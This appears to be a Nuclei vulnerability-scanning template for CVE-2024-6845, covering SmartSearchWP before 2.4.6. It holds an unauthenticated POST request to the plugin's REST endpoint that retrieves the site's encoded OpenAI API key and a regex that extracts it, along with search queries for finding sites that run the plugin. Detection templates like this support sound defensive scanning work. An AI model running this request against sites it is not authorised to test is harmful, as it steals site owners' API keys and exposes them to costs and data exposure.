id: CVE-2024-6845

info:
  name: SmartSearchWP < 2.4.6 - OpenAI Key Disclosure
  author: s4e-io
  severity: medium
  description: |
    The plugin does not have proper authorization in one of its REST endpoints, allowing unauthenticated users to retrieve the encoded key and then decode it, thereby leaking the OpenAI API key.
  impact: |
    Unauthenticated attackers can retrieve and decode the OpenAI API key through an unsecured REST endpoint, potentially incurring API usage costs and data exposure.
  remediation: |
    Update SmartSearchWP plugin to version 2.4.6 or later to address the API key disclosure vulnerability.
  reference:
    - https://wpscan.com/vulnerability/cfaaa843-d89e-42d4-90d9-988293499d26/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-6845
  classification:
    cve-id: CVE-2024-6845
    cwe-id: CWE-862
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    epss-score: 0.01084
    epss-percentile: 0.60978
  metadata:
    max-request: 2
    verified: true
    vendor: webdigit
    product: smartsearchwp
    framework: wordpress
    publicwww-query: "/wp-content/plugins/smartsearchwp"
    fofa-query: body="/wp-content/plugins/smartsearchwp"
  tags: cve,cve2024,exposure,wp,wordpress,wp-plugin,smartsearchwp,vuln

flow: http(1) && http(2)

http:
  # Request 1: confirm the plugin's asset path appears on the home page.
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"/wp-content/plugins/smartsearchwp")'
          - 'status_code == 200'
        condition: and
        internal: true

  # Request 2: call the REST endpoint without credentials and check for a JSON response.
  - raw:
      - |
        POST /wp-json/wdgpt/v1/api-key HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"key": "U2FsdGVkX1+X"}

    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type,"application/json")'
          - 'status_code == 200'
        condition: and

    extractors:
      - type: regex
        part: body
        name: api-key
        regex:
          - '"([^"]+)"'
# digest: 4b0a00483046022100ac2813ea3aedb3ca6e040df6dc665b80abbc741a139fa8da0ce3f79692d34791022100b4911e48a3528ec719a24f22ddfa5555e8f95778eadf0a13be05316027d85b59:922c64590222798bb761d5b6d8e72950